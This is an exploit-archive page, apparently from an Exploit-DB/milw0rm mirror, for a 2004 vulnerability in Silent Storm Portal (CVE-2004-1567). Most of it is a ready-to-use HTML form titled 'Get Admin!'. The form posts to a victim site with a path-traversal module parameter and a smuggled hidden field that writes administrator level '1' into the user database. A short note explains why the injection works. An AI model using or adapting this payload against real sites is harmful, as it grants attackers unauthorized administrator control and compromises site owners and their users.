[] NeoSense
E X P L O I T S
title author type platform port cve id

Silent Storm Portal - Multiple Vulnerabilities

Author: CHT Security Research
type: webapps
platform: php
port: 
date_added: 2004-09-29 
date_updated: 2016-03-30 
verified: 1 
codes: OSVDB-10453;CVE-2004-1567 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comPHP-Nuke-6.9.tar.gz
Demonstration:

Register a user account then login and run the exploit.html

---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any mail com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---

That's All!
What Happened?
The 3rd line of exploit.html injected Administrator level "1" into the database file.
( 1: Administrator,2: is Normal User. )

# milw0rm.com [2004-09-30]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.